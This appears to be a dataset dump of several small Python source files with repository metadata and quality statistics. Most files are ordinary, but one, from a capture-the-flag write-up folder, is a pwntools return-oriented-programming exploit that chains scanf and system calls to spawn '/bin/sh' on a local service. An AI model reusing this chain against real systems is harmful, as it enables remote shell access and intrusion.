hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7a8e4bbe77573044dc32a4127a4bbb4d91a902d1 | 649 | py | Python | library/lib_study/159_debug_trace.py | gottaegbert/penter | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | [
"MIT"
] | 13 | 2020-01-04T07:37:38.000Z | 2021-08-31T05:19:58.000Z | library/lib_study/159_debug_trace.py | gottaegbert/penter | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | [
"MIT"
] | 3 | 2020-06-05T22:42:53.000Z | 2020-08-24T07:18:54.000Z | library/lib_study/159_debug_trace.py | gottaegbert/penter | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | [
"MIT"
] | 9 | 2020-10-19T04:53:06.000Z | 2021-08-31T05:20:01.000Z | # python -m trace --count -C . somefile.py
# https://docs.python.org/zh-cn/3/library/trace.html
# Use the trace module to debug/trace this script: python -m trace --trace 159_debug_trace.py
def main():
    print("xxxxx")

main()
# import sys
# import trace
# # create a Trace object, telling it what to ignore, and whether to
# # do tracing or line-counting or both.
# tracer = trace.Trace(
# ignoredirs=[sys.prefix, sys.exec_prefix],
# trace=0,
# count=1)
#
# # run the new command using the given tracer
# tracer.run('main()')
#
# # make a report, placing output in the current directory
# r = tracer.results()
# r.write_results(show_missing=True, coverdir=".")
| 24.037037 | 68 | 0.684129 | 98 | 649 | 4.479592 | 0.673469 | 0.031891 | 0.05467 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011215 | 0.175655 | 649 | 26 | 69 | 24.961538 | 0.809346 | 0.87057 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0 | 0 | 0.333333 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7a917601f43966f35d030de0a4f74845b051da5b | 78 | py | Python | bandoleers/__init__.py | ibnpaul/bandoleers | 22398b134be40abd9a08f121f342923675b9fb52 | [
"BSD-3-Clause"
] | null | null | null | bandoleers/__init__.py | ibnpaul/bandoleers | 22398b134be40abd9a08f121f342923675b9fb52 | [
"BSD-3-Clause"
] | null | null | null | bandoleers/__init__.py | ibnpaul/bandoleers | 22398b134be40abd9a08f121f342923675b9fb52 | [
"BSD-3-Clause"
] | null | null | null | version_info = (3, 1, 0)
__version__ = '.'.join(str(s) for s in version_info)
| 26 | 52 | 0.666667 | 14 | 78 | 3.285714 | 0.714286 | 0.478261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0.153846 | 78 | 2 | 53 | 39 | 0.651515 | 0 | 0 | 0 | 0 | 0 | 0.012821 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8f8e5a2db87b4f600f71ff1e66c1b14a995f8c2b | 215 | py | Python | Testes Basicos/built_in_functions.py | gustavoLuuD/estudos_python | c8d3e97913d8fc2d046c7a1942b24800779438f5 | [
"MIT"
] | null | null | null | Testes Basicos/built_in_functions.py | gustavoLuuD/estudos_python | c8d3e97913d8fc2d046c7a1942b24800779438f5 | [
"MIT"
] | null | null | null | Testes Basicos/built_in_functions.py | gustavoLuuD/estudos_python | c8d3e97913d8fc2d046c7a1942b24800779438f5 | [
"MIT"
] | null | null | null | value = 74.55
value2 = 74.3
value4 = -100
print(f"Value 1 is {round(value)} and value 2 is {round(value2)}")
print(f"Value 1 is also {int(value)}")
print(f"The absolute value of {value4} is {abs(value4)}")
print(3//2) | 30.714286 | 64 | 0.665116 | 44 | 215 | 3.25 | 0.477273 | 0.167832 | 0.146853 | 0.251748 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10929 | 0.148837 | 215 | 7 | 65 | 30.714286 | 0.672131 | 0 | 0 | 0 | 0 | 0 | 0.597222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.571429 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
8f9ca99ab0d124af304b5e47ede7f6a170ae873f | 1,920 | py | Python | flaskr_carved_rock/models/user.py | ron4u1998/flaskr-carved-rock | 82d0e947e147c209bb799ad049653fea72ea678a | [
"BSD-3-Clause"
] | null | null | null | flaskr_carved_rock/models/user.py | ron4u1998/flaskr-carved-rock | 82d0e947e147c209bb799ad049653fea72ea678a | [
"BSD-3-Clause"
] | null | null | null | flaskr_carved_rock/models/user.py | ron4u1998/flaskr-carved-rock | 82d0e947e147c209bb799ad049653fea72ea678a | [
"BSD-3-Clause"
] | null | null | null | from uuid import uuid4

from sqlalchemy.orm import validates
from werkzeug.security import check_password_hash, generate_password_hash

from flaskr_carved_rock.login import login_manager
from flaskr_carved_rock.sqla import sqla
from flask_login import UserMixin


class User(UserMixin, sqla.Model):
    id = sqla.Column(sqla.Integer, primary_key=True)
    uuid = sqla.Column(sqla.String(64), nullable=False, default=lambda: str(uuid4()))
    username = sqla.Column(sqla.Text, nullable=False, unique=True)
    password = sqla.Column(sqla.Text, nullable=False)
    api_key = sqla.Column(sqla.String(64), nullable=True)  # use a UUID

    @validates('username', 'password')
    def validate_not_empty(self, key, value):
        if not value:
            raise ValueError(f'{key.capitalize()} is required.')
        if key == 'username':
            self.validate_unique(key, value, f'{value} already registered')
        if key == 'password':
            value = generate_password_hash(value)
        return value

    def validate_unique(self, key, value, error_message=None):
        if (
            User.query.filter_by(**{key: value}).first()
            is not None
        ):
            if not error_message:
                error_message = f'{key} must be unique.'
            raise ValueError(error_message)
        return value

    def correct_password(self, plaintext):
        return check_password_hash(self.password, plaintext)

    def get_id(self):
        return self.uuid

    def __repr__(self):
        return self.username


@login_manager.user_loader
def load_user(user_uuid):
    return User.query.filter_by(uuid=user_uuid).first()


@login_manager.request_loader
def load_user_from_request(request):
    api_key = request.headers.get('x-api-key')
    if api_key:
        user = User.query.filter_by(api_key=api_key).first()
        if user:
            return user
    return None | 30.967742 | 85 | 0.66875 | 251 | 1,920 | 4.928287 | 0.306773 | 0.029103 | 0.056589 | 0.041229 | 0.098626 | 0.098626 | 0 | 0 | 0 | 0 | 0 | 0.004071 | 0.232292 | 1,920 | 62 | 86 | 30.967742 | 0.835142 | 0.005208 | 0 | 0.042553 | 1 | 0 | 0.062336 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148936 | false | 0.148936 | 0.12766 | 0.085106 | 0.574468 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8fa3e70caa9d6c7c6d647e37d83f168d380b17f5 | 167 | py | Python | slackchatbakery/views/arguments/notification.py | The-Politico/django-politico-slackchat-2018-midterms-bakery | 77b82ce95f510c142254332255adc615833bcffb | [
"MIT"
] | null | null | null | slackchatbakery/views/arguments/notification.py | The-Politico/django-politico-slackchat-2018-midterms-bakery | 77b82ce95f510c142254332255adc615833bcffb | [
"MIT"
] | 9 | 2018-10-19T20:12:23.000Z | 2021-06-08T19:30:27.000Z | slackchatbakery/views/arguments/notification.py | The-Politico/django-politico-slackchat-2018-midterms-bakery | 77b82ce95f510c142254332255adc615833bcffb | [
"MIT"
] | null | null | null | from .base import BaseArgument
class Notification(BaseArgument):
    name = "slackchatbakery-notification"
    arg = "notification"
    path = "stubs/notification/"
| 20.875 | 41 | 0.730539 | 15 | 167 | 8.133333 | 0.733333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173653 | 167 | 7 | 42 | 23.857143 | 0.884058 | 0 | 0 | 0 | 0 | 0 | 0.353293 | 0.167665 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
8fb2b6f222d8f600f24fa8ae2c22e884a4891fca | 456 | py | Python | dueros/directive/VideoPlayer/VideoStop.py | ayxue/BaiduSaxoOpenAPI | d042366bb33ebdc4471b29e167b01c4cb7cb298d | [
"Apache-2.0"
] | null | null | null | dueros/directive/VideoPlayer/VideoStop.py | ayxue/BaiduSaxoOpenAPI | d042366bb33ebdc4471b29e167b01c4cb7cb298d | [
"Apache-2.0"
] | null | null | null | dueros/directive/VideoPlayer/VideoStop.py | ayxue/BaiduSaxoOpenAPI | d042366bb33ebdc4471b29e167b01c4cb7cb298d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- encoding=utf-8 -*-
# description:
# author:jack
# create_time: 2018/7/13
"""
desc:pass
"""
from dueros.directive.BaseDirective import BaseDirective
from dueros.directive.AudioPlayer.PlayBehaviorEnum import PlayBehaviorEnum
from dueros.Utils import Utils
class VideoStop(BaseDirective):
    def __init__(self):
        super(VideoStop, self).__init__('VideoPlayer.Stop')
        pass


if __name__ == '__main__':
    pass | 17.538462 | 74 | 0.721491 | 52 | 456 | 6 | 0.692308 | 0.096154 | 0.121795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023438 | 0.157895 | 456 | 26 | 75 | 17.538462 | 0.789063 | 0.223684 | 0 | 0.222222 | 0 | 0 | 0.070796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.222222 | 0.333333 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 3 |
8ff12f6df682241b328db019b6ead4ffb89e48ff | 128 | py | Python | pelicanconf_local.example.py | marcus-clements/pelican-netlify-cms | 0970c6d011301acec6feaf6d4391dcd8f983ef8d | [
"MIT"
] | null | null | null | pelicanconf_local.example.py | marcus-clements/pelican-netlify-cms | 0970c6d011301acec6feaf6d4391dcd8f983ef8d | [
"MIT"
] | null | null | null | pelicanconf_local.example.py | marcus-clements/pelican-netlify-cms | 0970c6d011301acec6feaf6d4391dcd8f983ef8d | [
"MIT"
] | 2 | 2020-05-17T00:49:23.000Z | 2020-05-21T11:39:56.000Z | LOAD_CONTENT_CACHE = False
# Uncomment following line if you want document-relative URLs when developing
#RELATIVE_URLS = True
| 25.6 | 77 | 0.820313 | 18 | 128 | 5.666667 | 0.888889 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140625 | 128 | 4 | 78 | 32 | 0.927273 | 0.742188 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
890651116b57bf07c975675fcb0152f690cec2d3 | 1,236 | py | Python | pwn/ROP/arr/writeup/exploit.py | roytu/challs2 | c087d802961451fce21ccaf9b4d908711233dda8 | [
"MIT"
] | null | null | null | pwn/ROP/arr/writeup/exploit.py | roytu/challs2 | c087d802961451fce21ccaf9b4d908711233dda8 | [
"MIT"
] | null | null | null | pwn/ROP/arr/writeup/exploit.py | roytu/challs2 | c087d802961451fce21ccaf9b4d908711233dda8 | [
"MIT"
] | null | null | null | from pwn import *
ppr = 0x80487ba
sysAddr = 0x8048430
scanf = 0x8048460
storage = 0x804999c
strFmtStr = 0x804882f
current = -2147483635
con = remote('localhost',1234)
con.sendline( "kablaa")
print "sending scanf..."
sleep(1)
con.sendline( str(current))
con.sendline(str(scanf))
current = current+1
print "sending ppr..."
sleep(1)
con.sendline( str(current))
con.sendline( str(ppr))
current = current+1
print "sending format string..."
sleep(1)
con.sendline( str(current))
con.sendline( str(strFmtStr))
current = current+1
print "sending storage address..."
sleep(1)
con.sendline( str(current))
con.sendline( str(storage))
current = current+1
print "sending system address.."
sleep(1)
con.sendline( str(current))
con.sendline( str(sysAddr))
current = current+1
print "sending junk return address..."
sleep(1)
con.sendline( str(current))
con.sendline( str(0xdeadbeef))
current = current+1
print "sending addrss of comand..."
sleep(1)
con.sendline( str(current))
con.sendline( str(storage))
current = current+1
print "sending the other values"
sleep(1)
con.sendline( str(2))
con.sendline( str(2))
con.sendline( str(2))
con.sendline( str(2))
con.sendline( str(2))
con.sendline( str(2))
con.sendline("/bin/sh")
con.interactive()
| 18.447761 | 38 | 0.727346 | 178 | 1,236 | 5.050562 | 0.241573 | 0.269188 | 0.311457 | 0.151279 | 0.68743 | 0.53059 | 0.53059 | 0.53059 | 0.53059 | 0.393771 | 0 | 0.065814 | 0.114887 | 1,236 | 66 | 39 | 18.727273 | 0.755942 | 0 | 0 | 0.555556 | 0 | 0 | 0.167611 | 0 | 0 | 0 | 0.044534 | 0 | 0 | 0 | null | null | 0 | 0.018519 | null | null | 0.148148 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
890884d403a44bf6e359a34cc5b3da6b4e1ecb25 | 92 | py | Python | Knight-Rank/DAY-5/114A.py | rohansaini886/Peer-Programming-Hub-CP-Winter_Camp | d27fb6aa7e726e6d2cb95270c9e644d38d64dd1c | [
"MIT"
] | 2 | 2021-12-09T18:07:46.000Z | 2022-01-26T16:51:18.000Z | Knight-Rank/DAY-5/114A.py | rohansaini886/Peer-Programming-Hub-CP-Winter_Camp | d27fb6aa7e726e6d2cb95270c9e644d38d64dd1c | [
"MIT"
] | null | null | null | Knight-Rank/DAY-5/114A.py | rohansaini886/Peer-Programming-Hub-CP-Winter_Camp | d27fb6aa7e726e6d2cb95270c9e644d38d64dd1c | [
"MIT"
] | null | null | null | I=input
k=int(I())
l=int(I())
r=1
while k**r<l:r+=1
print(['NO','YES\n'+str(r-1)][k**r==l])
| 13.142857 | 39 | 0.51087 | 26 | 92 | 1.807692 | 0.5 | 0.12766 | 0.12766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035294 | 0.076087 | 92 | 6 | 40 | 15.333333 | 0.517647 | 0 | 0 | 0 | 0 | 0 | 0.076087 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8f18a459d761f3565f775b85fc15f7f49722a8e4 | 448 | py | Python | test/ontology/__init__.py | eigendude/pysosa | d645e484d2d588504ab8fbdfcd6584209d903fef | [
"BSD-3-Clause"
] | null | null | null | test/ontology/__init__.py | eigendude/pysosa | d645e484d2d588504ab8fbdfcd6584209d903fef | [
"BSD-3-Clause"
] | null | null | null | test/ontology/__init__.py | eigendude/pysosa | d645e484d2d588504ab8fbdfcd6584209d903fef | [
"BSD-3-Clause"
] | null | null | null | ################################################################################
#
# Copyright (C) 2019 Garrett Brown
# This file is part of pysosa - https://github.com/eigendude/pysosa
#
# SPDX-License-Identifier: BSD-3-Clause
# See the file LICENSE for more information.
#
################################################################################
from .ontology_factory_test import OntologyFactoryTest
from .sosa_test import SOSATest
| 34.461538 | 80 | 0.491071 | 40 | 448 | 5.425 | 0.85 | 0.092166 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012376 | 0.098214 | 448 | 12 | 81 | 37.333333 | 0.524752 | 0.40625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
8f3030bc43d74cdae77b5cb7a2c739e35bc810eb | 295 | py | Python | configs/pspnet/pspnet_r50-d8_yantai_st12.py | shuaizzZ/mmsegmentation | a6c6b348dbf8c4a0a39ffbdb832a1e82309c533c | [
"Apache-2.0"
] | null | null | null | configs/pspnet/pspnet_r50-d8_yantai_st12.py | shuaizzZ/mmsegmentation | a6c6b348dbf8c4a0a39ffbdb832a1e82309c533c | [
"Apache-2.0"
] | null | null | null | configs/pspnet/pspnet_r50-d8_yantai_st12.py | shuaizzZ/mmsegmentation | a6c6b348dbf8c4a0a39ffbdb832a1e82309c533c | [
"Apache-2.0"
] | null | null | null | _base_ = [
    '../_base_/models/du_pspnet_r50-d8.py', '../_base_/datasets/yantai_st12.py',
    '../_base_/runtimes/yantai_runtime.py', '../_base_/schedules/schedule_yantai.py'
]
model = dict(
    decode_head=dict(num_classes=4), auxiliary_head=dict(num_classes=4))
test_cfg = dict(mode='whole') | 42.142857 | 84 | 0.715254 | 42 | 295 | 4.547619 | 0.619048 | 0.094241 | 0.115183 | 0.188482 | 0.198953 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026119 | 0.091525 | 295 | 7 | 85 | 42.142857 | 0.686567 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0.483108 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8f503e25fa8ba64b0a369b2aaaa138d8e45ad961 | 20 | py | Python | tests/core_symbol.py | cubetrain/CubeTrain | b930a3e88e941225c2c54219267f743c790e388f | [
"MIT"
] | null | null | null | tests/core_symbol.py | cubetrain/CubeTrain | b930a3e88e941225c2c54219267f743c790e388f | [
"MIT"
] | null | null | null | tests/core_symbol.py | cubetrain/CubeTrain | b930a3e88e941225c2c54219267f743c790e388f | [
"MIT"
] | null | null | null | CORE_SYMBOL='SEAT'
| 10 | 19 | 0.75 | 3 | 20 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 20 | 1 | 20 | 20 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8f7a5cb0eb1d44c1a8768d02ea571d4cb3b2f950 | 110 | py | Python | ariadne_django/__init__.py | drewsynan/ariadne_django | 836b783a7240eed0ee03b7db1bbb7c5ff2843fb4 | [
"BSD-3-Clause"
] | 34 | 2021-04-08T15:36:14.000Z | 2022-03-22T14:30:28.000Z | ariadne_django/__init__.py | drewsynan/ariadne_django | 836b783a7240eed0ee03b7db1bbb7c5ff2843fb4 | [
"BSD-3-Clause"
] | 34 | 2021-04-08T02:17:25.000Z | 2022-03-22T12:25:41.000Z | ariadne_django/__init__.py | drewsynan/ariadne_django | 836b783a7240eed0ee03b7db1bbb7c5ff2843fb4 | [
"BSD-3-Clause"
] | 11 | 2021-04-08T16:47:36.000Z | 2022-03-26T23:25:39.000Z | import django
if django.VERSION < (3, 2):
    default_app_config = "ariadne_django.apps.AriadneDjangoConfig"
| 22 | 66 | 0.763636 | 14 | 110 | 5.785714 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021053 | 0.136364 | 110 | 4 | 67 | 27.5 | 0.831579 | 0 | 0 | 0 | 0 | 0 | 0.354545 | 0.354545 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
56b0ae473eaa877406bacaa1f58eac9a2aa1929e | 301 | py | Python | cloudrail/knowledge/context/aws/networking_config/inetwork_configuration.py | my-devops-info/cloudrail-knowledge | b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e | [
"MIT"
] | null | null | null | cloudrail/knowledge/context/aws/networking_config/inetwork_configuration.py | my-devops-info/cloudrail-knowledge | b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e | [
"MIT"
] | null | null | null | cloudrail/knowledge/context/aws/networking_config/inetwork_configuration.py | my-devops-info/cloudrail-knowledge | b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e | [
"MIT"
] | null | null | null | from abc import abstractmethod
from typing import List
from cloudrail.knowledge.context.aws.networking_config.network_configuration import NetworkConfiguration
class INetworkConfiguration:
    @abstractmethod
    def get_all_network_configurations(self) -> List[NetworkConfiguration]:
        pass
| 27.363636 | 104 | 0.82392 | 31 | 301 | 7.83871 | 0.741935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129568 | 301 | 10 | 105 | 30.1 | 0.927481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.142857 | 0.428571 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 3 |
56b532a63744e31c6a636400a74ee6dcf3696e2b | 5,343 | py | Python | tests/console/input/testinput.py | LowieHuyghe/scriptcore | 0c9d94b353d4d149db9492eb4ae0aa87cc1e082c | [
"Apache-2.0"
] | null | null | null | tests/console/input/testinput.py | LowieHuyghe/scriptcore | 0c9d94b353d4d149db9492eb4ae0aa87cc1e082c | [
"Apache-2.0"
] | 6 | 2017-02-23T13:22:31.000Z | 2018-07-06T04:51:06.000Z | tests/console/input/testinput.py | LowieHuyghe/scriptcore | 0c9d94b353d4d149db9492eb4ae0aa87cc1e082c | [
"Apache-2.0"
] | null | null | null |
from scriptcore.testing.testcase import TestCase
from scriptcore.console.input.input import Input
import mock
import sys
class TestInput(TestCase):
    def test_default(self):
        """
        Test default input
        :return: void
        """

        description = self.rand_str()
        description2 = self.rand_str()
        input = Input()

        with mock.patch(self._get_pathable_input(), return_value='e8n0dpankpdvdni3kgac'):
            value = input(description)
